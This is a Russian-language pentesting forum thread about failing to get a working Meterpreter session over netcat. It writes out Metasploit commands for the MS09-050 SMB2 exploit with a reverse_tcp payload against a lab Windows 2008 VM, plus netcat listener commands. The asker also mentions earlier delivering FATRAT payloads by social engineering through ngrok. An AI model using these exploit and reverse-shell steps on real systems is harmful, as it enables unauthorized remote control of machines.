• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

meterpreter и nc

FlowLight

Green Team
31.07.2017
29
31
BIT
1
Доброго времени господа pentesterы!
Я прошу просвещения!

Раньше , для получения meterpretera я генерил payload c помощью FATRAT и с помощью СИ доставлял его на целевую машину, а с помощью ngrok ловил реверс. Сейчас же я его не заливаю на целевой ПК , а задаю следующие параметры на своей машине и ловлю реверс.

Вопрос ! Почему мне не удаётся получить полноценный meterpreter ? ПРОШУ О ПРОСВЯЩЕНИИ :(


Дело следующее :

1.Имеется испытуемая виртуалка win 2008 на ESXI с адресом 192.168.0.231 и атакцющая машина с адресом 192.168.0.238
2.Для получения meterpreter использую netcat
Задаю параметры :
use windows/smb/ms09_050_smb2_negotiate_func_index
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.0.231
set LHOST 192.168.0.238
set LPORT 4444
exploit

nc 192.168.0.238 4444

3.после получения meterpreter невозможно использовать такие команды как sysinfo , getuid и тд



Screenshot from 2018-10-31 13-49-12.png
 

pr0phet

Platinum
02.04.2018
358
496
BIT
12
Для метерпретера при приеме бэкконекта нужно использовать не неткат, а хендлер:
use exploit/multi/handler

Попробуй в качестве пайлоада указать
set payload windows/shell/reverse_tcp
Запуск нетката:
nc -lvp 4444

Пару ссылок по теме:
О создании пэйлоадов для разных платформ с помощью msfvenom
 
Последнее редактирование:
  • Нравится
Реакции: Vertigo и Vander
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!